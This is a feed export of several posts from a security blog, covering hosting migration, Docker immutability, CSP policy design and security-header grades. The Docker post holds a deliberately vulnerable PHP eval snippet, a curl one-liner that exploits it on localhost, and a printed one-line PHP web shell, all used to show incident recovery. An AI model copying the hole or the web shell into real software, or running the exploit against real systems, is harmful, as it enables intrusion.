<p>When running a container with a volume that points to a local path, hyper.sh will automatically upload the data and create a new (10GB) volume for us. So all I had to do was download the current Ghost blog directory from my DO instance to my laptop, and do <code>hyper run</code>:</p>
<pre><code class="language-terminal">&#x279C; scp -r ghost@ghost:/var/www/ghost/ ghost
&#x279C; hyper run -v ./ghost_data:/var/lib/ghost alpine sh
Sending ghost_data 312 / 312 [=========================] 100.00% 27s
&#x279C; hyper volume ls
DRIVER              VOLUME NAME                                                       SIZE                CONTAINER
hyper               794b1...a0f184   10 GB               66d5943a5ab1
</code></pre>
<p>With the data uploaded to the remote volume, we just have to run the Ghost blog with the same arguments we were using to run it before (inside of the DO droplet), except for <code>-v</code> that now needs the volume ID instead of the path to the data:</p>
<pre><code class="language-terminal">&#x279C; hyper run -d --name ghost-blog -v 794b1...a0f184:/var/lib/ghost \ 
--restart always -e &quot;NODE_ENV=production&quot; -p 80:2368 ghost
&#x279C; hyper logs -f ghost-blog

Ghost is running in production...
Your blog is now available on http://diogomonica.com
Ctrl+C to shut down
</code></pre>
<p>The final step we have to take is to get ourselves a publicly routable IP address, and attach it to our <code>ghost-blog</code> container. We can do that easily by running the <code>hyper fip allocate</code> and <code>hyper fip attach</code> commands:</p>
<pre><code class="language-terminal">&#x279C; hyper hyper fip allocate 1
209.177.92.130
&#x279C; hyper fip attach 209.177.92.130 ghost-blog
&#x279C; &#x279C;  ~ curl 209.177.92.130
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
...
</code></pre>
<h2 id="monthlycost">Monthly cost</h2>
<p>The pricing of hyper.sh is more complicated than the simple $5 a month for Digital Ocean. Here is a link to the <a href="https://hyper.sh/pricing.html?ref=blog.diogomonica.com">pricing page</a>.</p>
<p>They charge $5.18 for the default S4 container size (512MB of ram), $1 for the public IP address, and $0.1 for the first GB of image storage, bringing the TCO to $6.28.</p>
<blockquote>
<p>What?</p>
</blockquote>
<p>Yup. Turns out using the default container size for the blog would actually be more expensive than using the smallest Digital Ocean droplet. Fortunately hyper.sh has smaller sizes to offer:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/12/Screenshot-2016-12-02-18.22.09.png" alt loading="lazy"></p>
<p>You can change the container size by using the <code>--size=SIZE</code> option when doing <code>hyper run</code>. I wasn&apos;t able to make the S1 or S2 sizes work due memory constraints. The S3 size, however, worked great, bringing the total cost of running my blog down from $5 to  $3.69. A whole dollar and 31 cents of savings per month!!</p>
<h2 id="conclusion">Conclusion</h2>
<p>I was really impressed by how easy and seamless it was to migrate from DO to hyper.sh. I was expecting more than $1.31 of savings, but the fact that I no longer have to manage/update the underlying OS is the major advantage that hyper.sh is providing its users.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Increasing Attacker Cost Using Immutable Infrastructure]]></title><description><![CDATA[Applications will never be perfect, but immutable infrastructure helps with incident response, allows fast-recovery, and makes the attacker’s jobs harder. 
]]></description><link>https://blog.diogomonica.com/2016/11/19/increasing-attacker-cost-using-immutable-infrastructure/</link><guid isPermaLink="false">62d8ce7b47f91800018f06da</guid><category><![CDATA[docker]]></category><category><![CDATA[immutable]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sat, 19 Nov 2016 23:47:51 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>One neat thing about Docker containers is the fact that they are immutable. Docker ships with a copy-on-write filesystem, meaning that the base image cannot be modified, unless you explicitly issue a commit.</p>
<p>One of the reasons why this is so handy is that you get to check for drift really easily, and that might come in handy if are trying to investigate a security incident.</p>
<h3 id="demoapplication">Demo application</h3>
<p>Take the following demo infrastructure as an example:</p>
<img src="https://blog.diogomonica.com/content/images/2016/09/Security-@Scale-diagrams.png" width="500px" height="200px">
<p>We have a <a href="https://github.com/diogomonica/apachehackdemo?ref=blog.diogomonica.com">PHP application</a> running on our Front-end, and a MySQL server acting as our backend database. You can follow along at home by running:</p>
<pre><code class="language-console">&#x279C; docker run -d --name db -e MYSQL_ROOT_PASSWORD=insecurepwd mariadb
&#x279C; docker run -d -p 80:80 --link db:db diogomonica/phphack
</code></pre>
<p>Now that you have your database and front-end running you should be greeted by something that looks like this:</p>
<img src="https://blog.diogomonica.com/content/images/2016/09/Screenshot-2015-06-03-17-31-26-1.png" width="500px" height="200px">
<p>Unfortunately, and not unlike every single other PHP application out there, this application has a remote code execution vulnerability:</p>
<pre><code class="language-php">if($links) {
&lt;h3&gt;Links found&lt;/h3&gt;
... 
eval($_GET[&apos;shell&apos;]);
?&gt;
</code></pre>
<p>It looks like someone is using <code>eval</code> where they shouldn&apos;t! Any attacker can exploit this vulnerability, and execute arbitrary commands on the remote host:</p>
<pre><code class="language-bash">&#x279C; curl -s http://localhost/\?shell\=system\(&quot;id&quot;\)\; | grep &quot;uid=&quot;
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre>
<p>The first action of any attacker on a recently compromised host is to make herself at home by downloading PHP shells and toolkits. Some attackers might even be inclined to redesign your website:</p>
<img src="https://blog.diogomonica.com/content/images/2016/09/Screenshot-2016-09-03-20-36-55.png" width="500px" height="200px">
<h3 id="recoveringfromthehack">Recovering from the hack</h3>
<p>Going back to immutability, one of the cool things that a copy-on-write filesystem provides is the ability to see all the changes that took place. By using the <code>docker diff</code> command, we can actually see what the attacker was up to in terms of file modifications:</p>
<pre><code class="language-bash">&#x279C; docker diff pensive_meitner
C /run
C /run/apache2
A /run/apache2/apache2.pid
C /run/lock
C /run/lock/apache2
C /var
C /var/www
C /var/www/html
C /var/www/html/index.html
A /var/www/html/shell.php
</code></pre>
<p>Interesting. It seems like the attacker not only modified our <code>index.html</code>, but also downloaded a php-shell, conveniently named <code>shell.php</code>. But our focus should be on getting the website back online.</p>
<p>We can store this image for later reference by doing a <code>docker commit</code>, and since containers are immutable (&#x1F389;), we can restart our container and we&#x2019;re back in business:</p>
<pre><code class="language-console">&#x279C; docker commit pensive_meitner
sha256:ebc3cb7c3a312696e3fd492d0c384fe18550ef99af5244f0fa6d692b09fd0af3
&#x279C; docker kill pensive_meitner
&#x279C; docker run -d -p 80:80 --link db:db diogomonica/phphack
</code></pre>
<img src="https://blog.diogomonica.com/content/images/2016/09/backinbiz.png" width="300px" height="200px">
<p>We can now go back to the saved image and look at what the attacker modified:</p>
<pre><code class="language-console">&#x279C; docker run -it ebc3cb7c3a312696e3fd492d0c384fe18550ef99af5244f0fa6d692b09fd0af3 sh
# cat index.html
&lt;blink&gt;HACKED BY SUPER ELITE GROUP OF HACKERS&lt;/blink&gt;
# cat shell.php
&lt;?php
eval($_GET[&apos;cmd&apos;]);
?&gt;
</code></pre>
<p>It looks like we just got hacked by the famous SUPER ELITE GROUP OF HACKERS. &#xAF;\<em>(&#x30C4;)</em>/&#xAF;</p>
<h3 id="increasingtheattackercost">Increasing the attacker cost</h3>
<p>Being able to see the changes in the container after an attack is certainly useful, but what if we could have avoided the attack in the first place? This is where <code>--read-only</code> comes in.</p>
<p>The <code>--read-only</code> flag instructs Docker to not allow any writes to the container&#x2019;s file-system. This would have avoided any modifications to <code>index.php</code>, but more importantly, it would not have allowed the attacker to download the php shell, or any other useful tools the attacker might want to use.</p>
<p>Let&#x2019;s try it out and see what happens:</p>
<pre><code class="language-console">&#x279C; docker run -p 80:80 --link db:db -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --sig-proxy=false --read-only diogomonica/phphack
...
172.17.0.1 - - [04/Sep/2016:03:59:06 +0000] &quot;GET / HTTP/1.1&quot; 200 219518 &quot;-&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48&quot;
sh: 1: cannot create index.html: Read-only file system
</code></pre>
<p>Given that our filesystem is now read-only, it seems that the attacker&#x2019;s attempt to modify our <code>index.html</code> was foiled. &#x1F60E;</p>
<h3 id="isthisbulletproof">Is this bullet-proof?</h3>
<p>No, absolutely not. Until we fix this RCE vulnerability, the attacker will still be able to execute code on our host, steal our credentials, and exfiltrate the data in our database.</p>
<p>This said, together with running a <a href="https://hub.docker.com/_/alpine/?ref=blog.diogomonica.com">minimal image</a>, and some other really cool <a href="https://www.delve-labs.com/articles/docker-security-production-2/?ref=blog.diogomonica.com">Docker security features</a>, you can make it <em>a lot</em> harder for any attacker to maintain persistence and continue poking around your network.</p>
<h3 id="conclusion">Conclusion</h3>
<p>The security of our applications will never be perfect, but having immutable infrastructure helps with incident response, allows fast-recovery, and makes the attacker&#x2019;s jobs harder.</p>
<p>If by using a strong sandbox and tuning a few knobs you can make your application safer, why wouldn&#x2019;t you? &#x1F433;</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Creating a CSP Policy from Scratch]]></title><description><![CDATA[In this post I go over how to create a least-privilege CSP policy from scratch.]]></description><link>https://blog.diogomonica.com/2015/12/30/creating-a-csp-policy-from-scratch/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c7</guid><category><![CDATA[csp]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Wed, 30 Dec 2015 20:54:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>When I added the Content-Security-Policy (CSP) security header to my website, I was more concerned about <a href="https://blog.diogomonica.com/2015/12/29/from-double-f-to-double-a/">getting a good rating</a> on <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a>, than actually creating a good policy. In this post I&apos;ll show you how I created a new, better, CSP policy from scratch.</p>
<p>I&apos;m going to assume some familiarity with the fundamentals of CSP. For a good introduction on CSP and the motivations behind it, read <a href="http://www.html5rocks.com/en/tutorials/security/content-security-policy/?ref=blog.diogomonica.com">this article</a>.</p>
<h2 id="startingapolicyfromscratch">Starting a policy from scratch</h2>
<p>CSP follows a whitelist model. If you include the header but don&apos;t include a specific directive, that is equivalent to specifying * as the valid source for that directive (i.e. everywhere). On the other hand, if you do include a directive, only the sources listed will be allowed.</p>
<p>There are a lot of directives that can be used to enforce policies for content types. You can see an exhaustive list of directives <a href="https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives?ref=blog.diogomonica.com">here</a>. CSP also allows policies around particular circumstances, such as whether the browser should include referer headers when following links away from a page.</p>
<p>A good start for any CSP policy is the directive <em>default-src &apos;none&apos;</em>. This directive does what you&apos;d expect it to do: if a directive isn&apos;t explicitly set, it will default to this value.</p>
<pre><code class="language-bash">Content-Security-Policy: default-src &apos;none&apos;
</code></pre>
<p>Unfortunately, the directives in the following list don&apos;t use <em>default-src</em> as a fallback, which means that we will have to remember to set them explicitly, or they will default to allowing everything.</p>
<ul>
<li>frame-ancestors</li>
<li>report-uri</li>
<li>base-uri</li>
<li>form-action</li>
<li>sandbox</li>
</ul>
<h2 id="addingsomesanedefaults">Adding some sane defaults</h2>
<p>First, we will start by allowing the current origin (<em>self</em>) to load most resource types. Second, we&apos;re going to instruct the browser to block <a href="https://developer.mozilla.org/en-US/docs/Security/MixedContent/How_to_fix_website_with_mixed_content?ref=blog.diogomonica.com">mixed content</a>, explicitly enable <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)?ref=blog.diogomonica.com">reflected XSS</a> protections, ensure we&apos;re not sending referrer headers when downgrading from HTTPS to HTTP (to avoid <a href="https://blog.mozilla.org/security/2015/01/21/meta-referrer/?ref=blog.diogomonica.com">referrer leaks</a>), and access every HTTP URL via HTTPS instead<sup><a id="ffn1" href="#fn1" class="footnote">1</a></sup>.</p>
<pre><code class="language-http">Content-Security-Policy: 
	default-src &apos;none&apos;; 
	script-src &apos;self&apos;; style-src &apos;self&apos;; 
	img-src &apos;self&apos;; font-src &apos;self&apos;; 
	upgrade-insecure-requests; block-all-mixed-content; 
	reflected-xss block; referrer no-referrer-when-downgrade;
</code></pre>
<p>Note that, by leaving <em>connect-src</em>, <em>media-src</em>, <em>object-src</em>, and <em>child-src</em> out of this policy, we&apos;re effectively disallowing XMLHttpRequest, WebSockets, audio, video, Flash, and iframes from being used with this website. Change it accordingly.</p>
<p>Even though generating CSP policies manually is incredibly instructive, it is also very typo prone. Feel free to use a <a href="https://report-uri.io/home/generate/?ref=blog.diogomonica.com">CSP headers generator</a> to generate your base policy instead.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/policy_generator.png" alt loading="lazy"></p>
<h2 id="testingthebasepolicy">Testing the base policy</h2>
<p>At this point we have a strong initial policy that will not allow loading anything external to your own domain. Instead of deploying it in enforce mode, which would most likely break your website, we can swap out <em>Content-Security-Policy</em> for <em>Content-Security-Policy-Report-Only</em>, and get a comprehensive list of everything that doesn&apos;t follow this base policy. This is a good way of finding the minimum set of necessary resources that we need to allow to enable enforce mode.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/chrome_developer_console.png" alt loading="lazy"></p>
<p>Some common exceptions you may have to add are going to be external resources, such as javascript, images and fonts. For example, in order to allow the embedding of slideshare decks (see image above), I added the following directive:</p>
<pre><code class="language-http">frame-src &apos;self&apos; https://www.slideshare.net;
</code></pre>
<p>To allow loading google fonts and google analytics, I added:</p>
<pre><code class="language-http">script-src &apos;self&apos; https://www.google-analytics.com/;
img-src &apos;self&apos; https://www.google-analytics.com; 
style-src &apos;self&apos; https://fonts.googleapis.com; 
font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com;
</code></pre>
<p>Note the change to <em>img-src</em> directive. Google analytics uses a tracking pixel, which is technically an image.</p>
<h3 id="inlinecode">Inline Code</h3>
<p>One of the reasons why CSP is such a big deal for web security is the fact that it can largely eliminate XSS attacks. It does so by not allowing inline <em>script</em> tags and <em>javascript://</em> URLs. Unfortunately, developers use a lot of inline code. This is actually one of the most common roadblocks to creating a good CSP policy.</p>
<p>There is a directive value that was created specifically to work around this issue: <em>unsafe-inline</em>, but you should never use it. Instead, you should <a href="http://stackoverflow.com/questions/21593051/converting-inline-javascript-to-external?ref=blog.diogomonica.com">turn your inline javascript into an externally loaded script</a>.</p>
<h2 id="reportingpolicyviolations">Reporting Policy Violations</h2>
<p>One of the coolest directives of CSP is <em>report-uri</em>, which specifies the URL to which browsers should report violations of the Content Security Policy. You can deploy your own application to receive these reports, or use a free online version, like <a href="https://report-uri.io/?ref=blog.diogomonica.com">report-uri.io</a>.</p>
<p>In my case, I signed up for <a href="https://report-uri.io/?ref=blog.diogomonica.com">report-uri.io</a>, configured my domain to be <em>diogomonica.com</em>, and added the following line to my policy:</p>
<pre><code class="language-http">report-uri https://report-uri.io/report/59e303e8e117668e8e166508913a6d1d;
</code></pre>
<p>This will be my own, unique URL, which browsers will send JSON reports to, concerning any violations on diogomonica.com. This is what a violation would look like:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/report.png" alt loading="lazy"></p>
<p>And the corresponding JSON:</p>
<pre><code class="language-json">{
    &quot;csp-report&quot;: {
        &quot;document-uri&quot;: &quot;https://diogomonica.com/2015/12/29/from-double-f-to-double-a/&quot;,
        &quot;referrer&quot;: &quot;&quot;,
        &quot;violated-directive&quot;: &quot;img-src &apos;self&apos; https://www.google-analytics.com&quot;,
        &quot;effective-directive&quot;: &quot;img-src&quot;,
        &quot;original-policy&quot;: &quot;default-src &apos;none&apos;; script-src &apos;self&apos; https://www.google-analytics.com/; img-src &apos;self&apos; https://www.google-analytics.com; style-src &apos;self&apos; &apos;unsafe-inline&apos; https://fonts.googleapis.com; font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com; frame-src &apos;self&apos; https://www.slideshare.net; upgrade-insecure-requests; block-all-mixed-content; reflected-xss block; referrer no-referrer-when-downgrade; frame-ancestors &apos;none&apos;; base-uri diogomonica.com www.diogomonica.com; form-action &apos;none&apos;; report-uri https://report-uri.io/report/59e303e8e117668e8e166508913a6d1d;&quot;,
        &quot;blocked-uri&quot;: &quot;data&quot;,
        &quot;status-code&quot;: 0
    }
}
</code></pre>
<h2 id="addingthefinaldirectives">Adding the final directives</h2>
<p>Remember the earlier directives that don&apos;t inherit the default behavior? Well, we should explicitly set those to some reasonable values.</p>
<ul>
<li><em>frame-ancestors</em> specifies valid parents that may embed a page using <em>frame</em> and <em>iframe</em> elements.</li>
<li><em>base-uri</em> defines the URIs that a user agent may use as the document base URL.</li>
<li><em>form-action</em> specifies valid endpoints for <em>form</em> submissions.</li>
<li><em>sandbox</em> <a href="https://html.spec.whatwg.org/multipage/browsers.html?ref=blog.diogomonica.com#sandboxing">places restrictions on actions the page can take</a>, instead of restricting resources it can load. It will be the topic of a future blog post.</li>
</ul>
<p>This is my final policy:</p>
<pre><code class="language-http">Content-Security-Policy 
	&quot;default-src &apos;none&apos;; 
	script-src &apos;self&apos; https://www.google-analytics.com/; 
	img-src &apos;self&apos; https://www.google-analytics.com; 
	style-src &apos;self&apos; https://fonts.googleapis.com; 
	font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com; 
	frame-src &apos;self&apos; https://www.slideshare.net; 
	upgrade-insecure-requests; block-all-mixed-content; 
	reflected-xss block; referrer no-referrer-when-downgrade; 
	frame-ancestors &apos;none&apos;; form-action &apos;none&apos;; 
	base-uri diogomonica.com www.diogomonica.com;
	report-uri https://report-uri.io/report/59e303e8e117668e8e166508913a6d1d;&quot;
</code></pre>
<p>At this point we can use the <a href="https://report-uri.io/home/analyse?ref=blog.diogomonica.com">online CSP analyzer</a>, to make sure we&apos;re green across the board.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/green_across.png" alt loading="lazy"></p>
<h2 id="dealingwithlargecspheaders">Dealing with large CSP headers</h2>
<p>Unfortunately, HTTP headers aren&apos;t compressed<sup><a id="ffn2" href="#fn2" class="footnote">2</a></sup>, which means that you will be injecting a potentially large CSP header into every HTTP response.</p>
<p>To avoid that, you can set some or all of your policies directly in the page markup. You do that by using the meta tag with an http-equiv attribute:</p>
<pre><code class="language-html">&lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;default-src &apos;none&apos;; script-src &apos;self&apos; https://www.google-analytics.com/;&quot;&gt; 
</code></pre>
<p>There are three directives that can&#x2019;t be set using meta tags: <em>frame-ancestors</em>, <em>report-uri</em>, and <em>sandbox</em>.</p>
<p>Another possible work-around is to take advantage of the conditional header injection features of your web server. If you&apos;re using nginx, you can create a map that will return different headers, based on the content-type of the page.</p>
<pre><code class="language-http">map $sent_http_content_type $csp_policies {
    &quot;text/html&quot;    &quot;default-src &apos;none&apos;; script-src &apos;self&apos; https://www.google-analytics.com/; ...&quot;;
    default       &quot;default-src &apos;none&quot;;
}

server {
    location / {
        add_header &quot;Content-Security-Policy&quot; $csp_policies;
    }
}
</code></pre>
<h2 id="conclusion">Conclusion</h2>
<p>By designing your CSP policies from scratch, you can achieve a least-privilege CSP deployment, and create a policy that allows exactly what you need. No more, no less.</p>
<p>If you start by enabling CSP in <em>Report-Only</em> mode, you can start knocking off all the necessary exceptions, with the help of the Chrome Developer Console, and easily change it to enforce mode later on.</p>
<p>If you care about the security of your users, you should care about CSP.</p>
<ol id="footnotes">
  <li id="fn1">The upgrade-insecure-requests and referrer policies are still a &quot;Working draft&quot;. <a href="#ffn1">&#x21A9;</a></li>
  <li id="fn2">This might not be as big of a problem in the future, since both HTTP2 and SPDY support header compression. <a href="#ffn2">&#x21A9;</a></li>
</ol>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[From F to A+: Getting Good Grades on Website Security Evaluations]]></title><description><![CDATA[Even though www.diogomonica.com is a statically generated HTML blog, I took the time to go from an F on securityheaders.io to an A+.]]></description><link>https://blog.diogomonica.com/2015/12/29/from-double-f-to-double-a/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c5</guid><category><![CDATA[csp]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Tue, 29 Dec 2015 15:18:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Even though diogomonica.com is a statically generated blog, created using <a href="https://jekyllrb.com/?ref=blog.diogomonica.com">Jekyll</a>, it&apos;s always fun to run it through security evaluation websites such as <a href="https://www.ssllabs.com/ssltest/?ref=blog.diogomonica.com">SSL Labs</a> and <a href="https://securityheaders.io/?ref=blog.diogomonica.com">Security Headers</a>.</p>
<p>Unfortunately, last week, when I ran it through <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a>&apos;s checker, I got the following result:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/f_rating_on_security_headers.png" alt loading="lazy"></p>
<p>This is obviously embarrassing for someone who works in security, and even though my blog has no need for advanced security headers, I decided to change that rating to an A+.</p>
<h2 id="whataretheseheaders">What are these headers?</h2>
<p>Before we turn those red warning boxes into a more pleasant light green, let me give you a high-level overview of what these headers are, and why you should make sure to include them in your web properties.</p>
<ul>
<li><strong>Content-Security-Policy (CSP)</strong>: allows the website to define a policy concerning which domains external javascripts, css, images, etc, can be imported and rendered from. Prevents XSS and other cross-site injections.</li>
<li><strong>X-Content-Type-Options</strong>: prevents IE and Google Chrome from MIME-sniffing a response away from the declared content-type.</li>
<li><strong>X-Frame-Options</strong>: protects against clickjacking attacks.</li>
<li><strong>X-XSS-Protection</strong>: essentially useless; it comes enabled by default in modern browsers.</li>
<li><strong>Strict-Transport-Security (HSTS)</strong>: tells your browser to always connect to a particular domain over HTTPS. Attackers aren&apos;t able to downgrade connections, and users can&apos;t ignore TLS warnings.</li>
<li><strong>Public-Key-Pins (HPKP)</strong>: tells your browser to associate a specific public key fingerprint with a particular domain. Prevents against an attacker getting a valid certificate from one of the hundreds of other Certificate Authorities out there.</li>
</ul>
<h2 id="fixingtheeasyones">Fixing the easy ones</h2>
<p>This is a lot less fun to do in a production setting, since changes like this have a tendency to break obscure corners of your application, but these headers are trivial to setup and will probably have minimal impact on your website.</p>
<p>Since I&apos;m running nginx as my webserver, I&apos;ll have to add <em>add_header</em> directives to my configuration file:</p>
<pre><code class="language-bash">add_header X-Frame-Options &quot;SAMEORIGIN&quot;;
add_header X-Content-Type-Options nosniff;
add_header X-XSS-Protection &quot;1; mode=block&quot;;
</code></pre>
<p>There isn&apos;t a lot to consider when choosing the arguments for these three headers, but if you want more information about them, make sure you consult the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers?ref=blog.diogomonica.com">Mozilla Headers page</a>.</p>
<h2 id="addinghstsandcsptothemix">Adding HSTS and CSP to the mix</h2>
<p>If you deploy an over-aggressive CSP policy, browsers might disallow resources from being loaded and your website will break. If you deploy an HSTS policy and at a later time disable HTTPS on your website/application, users will temporarily be disallowed access to your website.</p>
<h3 id="hsts">HSTS</h3>
<p>Since I&apos;m always going to run my website over TLS, I&apos;m enabling HSTS with a <a href="https://developer.mozilla.org/en-US/docs/Web/Security/HTTP_strict_transport_security?ref=blog.diogomonica.com"><em>max-age</em></a> parameter of 7776000 (seconds). This will tell browsers that, for the next three months, they should only attempt accessing diogomonica.com over HTTPS:</p>
<pre><code class="language-bash">add_header Strict-Transport-Security max-age=7776000;
</code></pre>
<p>Another important HSTS parameter is <em>includeSubDomains</em>, which I&apos;m leaving disabled, since it&apos;s common for me to run non-https demo sites under *.diogomonica.com. You should enable it if you&apos;re sure every single sub-domain will always be using HTTPS.</p>
<h3 id="csp">CSP</h3>
<p>CSP has two different modes of operation: enforce and report. If you use the <em>Content-Security-Policy</em> header, CSP will operate in enforce mode; if you use <em>Content-Security-Policy-Report-Only</em> it will operate in report mode.</p>
<p>CSP is pretty complex, and I recommend enabling it in report mode first, since it will allow you to understand the changes you need to make to enable enforcement later on. You should also read about the different <a href="https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives?ref=blog.diogomonica.com">CSP policy directives</a>.</p>
<p>In my particular case, since no one will ever complain about my blog being broken, I jumped straight to enforce mode and, with the help of the Chrome Developer console, fixed the red-warnings one by one, resulting in this final policy:</p>
<pre><code class="language-bash">add_header Content-Security-Policy &quot;default-src &apos;self&apos;; 
script-src &apos;self&apos; &apos;unsafe-eval&apos; https://ssl.google-analytics.com https://ajax.cloudflare.com; 
img-src &apos;self&apos; https://ssl.google-analytics.com ; 
style-src &apos;self&apos; &apos;unsafe-inline&apos; https://fonts.googleapis.com; 
font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com; 
object-src &apos;none&apos;&quot;;
</code></pre>
<p>This is the current rating on <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a>, after restarting my nginx server:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/all_green_but_one.png" alt loading="lazy"></p>
<h3 id="gettingtoaenablinghpkp">Getting to A+ (enabling HPKP)</h3>
<p>HPKP works by having the browser lookup the HPKP headers and check whether any of those pins match any of the <a href="https://raymii.org/s/articles/HTTP_Public_Key_Pinning_Extension_HPKP.html?ref=blog.diogomonica.com">SPKI fingerprints</a> in the certificate chain. This means that you can use a pin from anywhere in the chain: from a leaf certificate all the way up to the root certificate.</p>
<p>Since the <a href="https://tools.ietf.org/html/rfc7469?ref=blog.diogomonica.com">RFC</a> states that you need to provide at least two pins, I created a new public/private key pair and stored it offline. After that, I got the SPKI fingerprint for both my keys. There are a <a href="https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning?ref=blog.diogomonica.com">few different ways</a> to do it.</p>
<p>I got the fingerprint from my current certificate using the following openssl command:</p>
<pre><code class="language-bash">root@burly:/etc/ssl# openssl x509 -in cloudflare-diogomonica.com.crt -pubkey -noout | openssl rsa -pubin -outform der | openssl dgst -sha256 -binary | base64
bDk6Wbfj83EpcaKgT5WkBfiiml66Tln3DskDJneGBoo=
</code></pre>
<p>HPKP is probably the most dangerous of all the security headers. Like HSTS, if something goes wrong (your private key gets compromised), users might be disallowed from accessing your website for the duration you specify in your <em>max_age</em> argument. Also, like CSP, HPKP actually comes with a <em>Report-Only</em> version, which allows you to test your pins, without risking downtime. I recommend this <a href="https://timtaubert.de/blog/2014/10/http-public-key-pinning-explained/?ref=blog.diogomonica.com">great blog post</a> by Tim Taubert for more info on HPKP.</p>
<p>As I mentioned before, the lack of readership of this blog allows me to jump right into enforcement mode, adding this new header to my nginx config:</p>
<pre><code class="language-bash">add_header Public-Key-Pins &apos;pin-sha256=&quot;bDk6Wbfj83EpcaKgT5WkBfiiml66Tln3DskDJneGBoo=&quot;; pin-sha256=&quot;E8WztKzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGWooE=&quot;; max-age=60&apos;;
</code></pre>
<p>I will point out that, even though I was being cavalier, I did set a <em>max_age</em> of 60 seconds for testing, allowing me to simply disable the header and wait a minute if I messed the PINs somehow.</p>
<p>If you want to reduce the risk of losing your keys or remove the need of having to deal with offline key-pairs, you can pin to a root CA. That will increase your surface of attack, but it will also make it easier to get a new valid certificate later. I would recommend pinning to Let&apos;s Encrypt, but be sure to read <a href="https://community.letsencrypt.org/t/hpkp-best-practices-if-you-choose-to-implement/4625?ref=blog.diogomonica.com">this</a> before you do.</p>
<h2 id="justshowmethescreenshot">Just show me the screenshot!</h2>
<p>After restarting nginx with all of our new headers, voil&#xE0;, A+.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/securityheaders_a_plus.png" alt loading="lazy"></p>
<h2 id="thissoundslikealotofworkcanicheatmywaytoa">This sounds like a lot of work, can I cheat my way to A+?</h2>
<p>Since <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a> is only checking for the presence of the header (it doesn&apos;t even attempt to parse parameters), the answer is yes:</p>
<pre><code class="language-bash">add_header Strict-Transport-Security max-age=0;
add_header X-Frame-Options &quot;ANYTHINGREALLY&quot;;
add_header X-Content-Type-Options anythingreally;
add_header X-XSS-Protection &quot;0&quot;;
add_header Content-Security-Policy &quot;default-src *&quot;;
add_header Public-Key-Pins max-age=0;
</code></pre>
<h2 id="whataboutgettinganaonssllabs">What about getting an A+ on SSL Labs?</h2>
<p>If you&apos;re ok with an A, use <a href="https://cloudflare.com/?ref=blog.diogomonica.com">cloudflare</a>. If you really want that A+, you can follow <a href="https://sethvargo.com/getting-an-a-plus-on-qualys-ssl-labs-tester/?ref=blog.diogomonica.com">this post</a>. <strong>Edit</strong>: @asaaki pointed out that you can also get an A+ on Cloudflare, as long as you have HSTS set to 180+ days.</p>
<h2 id="conclusion">Conclusion</h2>
<p>With the exception of HPKP, which I wouldn&apos;t really recommend enabling unless you have a very mature SecOps team, all of these headers should be enabled on any production website you deploy.</p>
<p>Remember: it will be a lot easier to iterate on configuration changes if you&apos;re not currently serving any traffic, so do it sooner rather than later. :)</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Password Security: Why the horse battery staple is not correct]]></title><description><![CDATA[Why the horse battery staple is not correct: We should **not** be incentivizing people to choose passwords in the first place.]]></description><link>https://blog.diogomonica.com/2014/10/11/password-security-why-the-horse-battery-staple-is-not-correct/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c8</guid><category><![CDATA[passwords]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sat, 11 Oct 2014 21:09:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>I&#x2019;ve intentionally kept myself from commenting on Password Security in the wake of the last month&#x2019;s mass iCloud account compromise. My feeling was that this topic had already been discussed to exhaustion, and there really was nothing new about the problem that was worth discussing.</p>
<p>However, as I read through the dozens of articles on <a href="http://www.independent.co.uk/life-style/gadgets-and-tech/is-apples-icloud-safe-how-to-create-a-stronger-password-and-turn-on-twostep-verification-9703485.html?ref=blog.diogomonica.com" title="How to choose a stronger password">how to choose a strong password</a>, I realized that the majority of them are focused on trying to solve the wrong problem.</p>
<p>We should <strong>not</strong> be incentivizing people to choose passwords in the first place.</p>
